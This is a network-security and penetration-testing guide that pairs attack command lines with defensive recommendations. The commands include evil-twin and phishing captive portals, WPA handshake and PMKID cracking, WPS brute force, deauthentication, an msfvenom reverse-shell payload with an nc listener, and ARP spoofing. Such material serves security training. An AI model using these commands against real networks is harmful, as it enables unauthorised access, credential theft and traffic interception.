Network Security Fundamentals

This guide covers essential network security concepts, common protocol vulnerabilities, exploitation techniques, and defensive measures that are crucial for penetration testers and security professionals.

Wireless Security {#wireless-security}

Wireless Penetration Testing

Wireless networks present unique attack vectors that require specialized techniques and tools. This section covers comprehensive wireless security assessment methodologies.

Initial Setup and Enumeration

Interface Configuration:

 
# Disable managed interfaces to prevent conflicts
sudo service NetworkManager restart
 
 
# Enable monitor mode
sudo airmon-ng start wlx00c0ca978978
 
 
# GPS configuration for kismet
kismet -t session_name -c wlx00c0ca978978

Network Discovery with Kismet:

 
# List all discovered SSIDs
curl -b "KISMET=$KISMET_COOKIE" -s http://localhost:2501/devices/views/phydot11_accesspoints/devices.json | jq '.[] | ."kismet.device.base.name"' | sort
 
 
# Extract comprehensive network information
curl -b "KISMET=$KISMET_COOKIE" -s http://localhost:2501/devices/views/phydot11_accesspoints/devices.json | jq -r '.[] | {
  SSID: ."kismet.device.base.name",
  BSSID: ."kismet.device.base.macaddr",
  Encryption: ."kismet.device.base.crypt",
  Channel: ."kismet.device.base.channel",
  WPS: ."kismet.device.base.wps"
}'

Guest Network Attacks

Captive Portal Exploitation:

 
# Create evil twin with custom captive portal
sudo ./eaphammer -i wlx00c0ca978978 --essid openNetwork -c 4 --auth open --bssid 12:23:34:45:56:67 --captive-portal --portal-template custom_template --lhost 192.168.10.1

WPA/WPA2 PSK Attacks

PMKID Attack:

 
# Capture PMKID with eaphammer
sudo ./eaphammer --pmkid -i wlx00c0ca978978 --channel 1 --bssid 30:91:8F:2F:F7:97
 
 
# Convert captured PMKID
hcxpcapngtool -o pmkid_hash.22000 capture.pcapng
 
 
# Crack with hashcat
hashcat -m 22000 pmkid_hash.22000 wordlist.txt

WPS Attacks:

 
# Pixie Dust attack
reaver -i wlx00c0ca978978 -b MAC -c channel -K -N -vv
 
 
# Brute force attack
reaver -i wlx00c0ca978978 -b MAC -c channel -f -vv
 
 
# Null PIN attack
reaver -i wlx00c0ca978978 -b MAC -c channel -f -N -g 1 -vv -p ''

Handshake Capture and Cracking:

 
# Monitor specific network
sudo airodump-ng -c 1 --bssid MAC -w handshake_capture wlx00c0ca978978
 
 
# Force deauthentication to capture handshake
sudo aireplay-ng --deauth 4 wlx00c0ca978978 -a bssid_mac -c client_mac
 
 
# Convert handshake for cracking
hcxpcaptool -o handshake.22000 handshake_capture-01.cap
 
 
# Crack with hashcat
hashcat -m 22000 handshake.22000 rockyou.txt

Evil Twin Attacks

Credential Harvesting:

 
# Create fake WPA network
sudo ./eaphammer -i wlx00c0ca978978 -e fakeSSID -c 4 --auth open --bssid 12:23:34:45:56:67 --captive-portal --portal-template phishing_template
 
 
# WPA Evil Twin for handshake capture
sudo ./eaphammer -i wlx00c0ca978978 -e targetSSID -c 11 --bssid 12:23:34:45:56:67 --creds --auth wpa-psk --wpa-passphrase "randompassword" --wpa-version 2

WPA2 Enterprise Attacks

Certificate Information Gathering:

 
# Probe for certificate details
sudo wpa_supplicant -c probe_config.conf -D nl80211 -i wlx00c0ca978978 | grep CERT

Evil Twin for Enterprise Networks:

 
# Create certificate matching target network
sudo ./eaphammer --cert-wizard
 
 
# Deploy enterprise evil twin
sudo ./eaphammer -i wlx00c0ca978978 -e enterpriseSSID --bssid 12:23:34:45:56:67 -c 11 --creds --auth wpa-eap --negotiate weakest

Defensive Measures:

• Implement certificate pinning
• Use strong EAP methods (EAP-TLS)
• Monitor for rogue access points
• Implement network access control (NAC)
• Regular security assessments

Core Network Protocols and Their Vulnerabilities

1. FTP (File Transfer Protocol) - Port 21

Overview:

• Uses two channels: Command Channel and Data Channel
• Operates in Active or Passive mode
• Transmits data in clear text (no encryption)

Common Vulnerabilities:

• Clear-text transmission: Credentials and data can be intercepted
• Anonymous access misconfigurations
• Directory traversal vulnerabilities
• Bounce attacks (using FTP to scan internal networks)

Exploitation Techniques:

 
# Connect using telnet to enumerate
telnet <IP> 21
 
 
# FTP commands for enumeration
USER anonymous
PASS anonymous@
STAT  # Get server information
SYST  # Get system type
PASV  # Switch to passive mode
LIST  # List files
 
 
# Using ftp client
ftp <IP>

Security Measures:

• Replace FTP with SFTP or FTPS
• Disable anonymous access
• Implement strong authentication
• Use encryption for sensitive data transfers

2. SSH (Secure Shell) - Port 22

Overview:

• Encrypted remote access protocol
• Replaces insecure protocols like Telnet
• Supports various authentication methods

Common Vulnerabilities:

• Weak credentials
• SSH key mismanagement
• Outdated SSH versions with known vulnerabilities
• Misconfigured SSH settings

Security Hardening:

• Disable root login
• Use key-based authentication
• Implement fail2ban or similar brute-force protection
• Keep SSH updated
• Use non-standard ports (security through obscurity)

3. Telnet - Port 23

Overview:

• Legacy remote access protocol
• Transmits everything in clear text
• No built-in security features

Vulnerabilities:

• Clear-text credentials: Easy to intercept with packet sniffing
• No encryption: All commands and data visible
• Session hijacking: Easy to perform MITM attacks

Exploitation Example:

 
# Verify command execution capability
sudo tcpdump ip proto -i tun0
 
# From telnet session: .RUN ping <attacker-ip> -c 1
 
 
# Setup listener
nc -lvp <port>
 
 
# Generate reverse shell payload
msfvenom -p cmd/unix/reverse_netcat lhost=<IP> lport=<port>

Mitigation:

• Never use Telnet in production
• Replace with SSH immediately
• If legacy systems require it, isolate them completely

4. SMB (Server Message Block) - Ports 139/445

Overview:

• Network file sharing protocol
• Used for shared access to files, printers, and serial ports
• Runs over NetBIOS (port 139) or directly over TCP (port 445)

Common Vulnerabilities:

• EternalBlue (MS17-010)
• Null session enumeration
• Pass-the-hash attacks
• SMB relay attacks

Enumeration and Exploitation:

 
# Enumerate SMB shares
enum4linux <IP>
smbclient -L //<IP>/ -N
 
 
# Connect to share
smbclient //<IP>/<SHARE> -U <user>
 
 
# Check for vulnerabilities
nmap --script smb-vuln* -p 139,445 <IP>

Defense Strategies:

• Disable SMBv1
• Implement SMB signing
• Use strong authentication
• Restrict access with firewalls
• Regular patching

5. RDP (Remote Desktop Protocol) - Port 3389

Overview:

• Microsoft’s proprietary remote desktop protocol
• Provides graphical remote access to Windows systems
• Often exposed to the internet

Common Attack Vectors:

• BlueKeep (CVE-2019-0708)
• Brute force attacks
• Man-in-the-middle attacks
• Session hijacking

Security Measures:

• Use Network Level Authentication (NLA)
• Implement account lockout policies
• Use VPN for RDP access
• Enable RDP only when needed
• Keep systems patched

6. NFS (Network File System) - Port 2049

Overview:

• UNIX/Linux file sharing protocol
• Allows remote file system mounting
• Uses RPC for communication

Vulnerabilities:

• Misconfigured exports
• No authentication by default
• UID/GID manipulation

Exploitation:

 
# Enumerate NFS shares
showmount -e <IP>
 
 
# Mount NFS share
mkdir /tmp/mount
sudo mount -t nfs <IP>:<share> /tmp/mount -nolock
 
 
# Exploit misconfigured permissions
 
# Create SUID binaries if write access available

7. DNS (Domain Name System) - Port 53

Overview:

• Translates domain names to IP addresses
• Critical infrastructure component
• Uses both TCP and UDP

Common Attacks:

• DNS zone transfers
• DNS cache poisoning
• DNS tunneling
• DNS amplification DDoS

Enumeration Techniques:

 
# Brute-force subdomains
for ip in $(cat list.txt); do host $ip.domain.com; done
 
 
# Reverse DNS lookup
for ip in $(seq 200 254); do host 192.168.1.$ip; done | grep -v "not found"
 
 
# DNS recon tools
dnsrecon -d domain.com -t std
dnsenum domain.com

8. Email Protocols

SMTP (Simple Mail Transfer Protocol) - Port 25

Vulnerabilities:

• Clear-text transmission
• Open relay misconfiguration
• User enumeration via VRFY/EXPN commands

Exploitation:

 
# Connect and enumerate
telnet <IP> 25
HELO hostname
MAIL FROM: test@test.com
RCPT TO: user@target.com
DATA
Subject: Test
Message body
.

POP3 - Port 110 / IMAP - Port 143

Characteristics:

• POP3: Downloads and removes emails from server
• IMAP: Synchronizes emails across devices
• Both transmit in clear text by default

Security Considerations:

• Use SSL/TLS versions (POP3S: 995, IMAPS: 993)
• Implement strong authentication
• Monitor for brute force attempts

Network Attack Techniques

1. Man-in-the-Middle (MITM) Attacks

ARP Poisoning/Spoofing

How it works:

• Attacker sends forged ARP messages
• Associates attacker’s MAC with legitimate IP addresses
• All traffic flows through attacker’s machine

Execution:

 
# Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
 
 
# Perform ARP spoofing
arpspoof -i eth0 -t <victim> -r <gateway>
 
 
# Capture traffic with Wireshark

Defense:

• Static ARP entries for critical systems
• Dynamic ARP inspection on switches
• Network segmentation
• Encrypted protocols (HTTPS, SSH)

2. Network Segmentation and Isolation

Best Practices:

• Implement VLANs for different security zones
• Use firewalls between network segments
• Deploy DMZ for public-facing services
• Isolate critical infrastructure
• Implement zero-trust architecture

3. Firewall Bypass Techniques

Common Methods:

• Protocol tunneling (DNS, HTTP)
• Fragmentation attacks
• Source routing exploitation
• Application-layer bypass
• IPv6 tunneling in IPv4 networks

Defense:

• Deep packet inspection
• Application-aware firewalls
• Regular rule audits
• Egress filtering
• Intrusion Prevention Systems (IPS)

4. VPN Security

Common Issues:

• Weak encryption algorithms
• Pre-shared key vulnerabilities
• Split tunneling risks
• DNS leaks
• Outdated VPN protocols

Security Recommendations:

• Use strong encryption (AES-256)
• Implement certificate-based authentication
• Disable split tunneling
• Regular security audits
• Keep VPN software updated

5. Wireless Security

Common Vulnerabilities:

• WEP encryption (completely broken)
• WPA/WPA2 with weak passwords
• WPS PIN vulnerabilities
• Rogue access points
• Evil twin attacks

Best Practices:

• Use WPA3 where possible
• Strong, unique passwords
• Disable WPS
• Regular monitoring for rogue APs
• Enterprise authentication (802.1X)

Defense-in-Depth Strategy

1. Network Monitoring

• Implement IDS/IPS systems
• Network flow analysis
• SIEM integration
• Regular vulnerability scanning
• Penetration testing

2. Access Control

• Principle of least privilege
• Network Access Control (NAC)
• Strong authentication mechanisms
• Regular access reviews
• Segmentation and micro-segmentation

3. Encryption

• Use encrypted protocols (HTTPS, SSH, SFTP)
• VPN for remote access
• Encrypt data at rest and in transit
• Certificate management
• Key rotation policies

4. Incident Response

• Prepared response procedures
• Network forensics capabilities
• Isolation procedures
• Communication plans
• Regular drills and updates

Conclusion

Network security requires a comprehensive approach combining:

• Understanding of protocol vulnerabilities
• Implementation of security controls
• Regular monitoring and testing
• Continuous improvement
• User education and awareness

Remember that security is not a one-time implementation but an ongoing process that requires constant vigilance and adaptation to new threats.

Related Topics

• Web-Application-Security
• Linux-Security-and-Exploitation
• Tools-and-Methodologies